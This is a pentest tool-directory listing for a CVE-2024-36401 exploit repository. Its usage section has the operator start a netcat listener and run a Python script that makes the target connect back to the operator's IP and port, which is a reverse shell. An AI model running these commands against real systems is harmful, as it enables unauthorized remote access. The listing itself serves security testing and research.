Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-36401 | Kitploit
Tools/GitHubGitHub/kkhackz0013/cve-2024-36401
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubkkhackz0013/cve-2024-36401

CVE-2024-36401

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-36401

This is a program for checking the vulnerability of CVE-2024-36401.

Usage

First, execute the following command to listen for incoming connections.

root@kitploit:~
nc -lvnp 9000

Then, execute the file in another terminal window.

root@kitploit:~
python CVE-2024-36401.py --target example.com --target_port 8080  --myip 172.26.16.100 --myport 9000

--target The target's domain or IP address

--target_port The port number hosting the target's service

--myip Your IP address

--myport The port number you are listening on with nc

Disclaimer

Use this for vulnerability verification, learning, and enjoying hacking. We do not support or encourage any hacking or unauthorized access to any system or network. Use responsibly and only on systems where you have explicit permission.

Reference

https://github.com/Mr-xn/CVE-2024-36401

Download Tool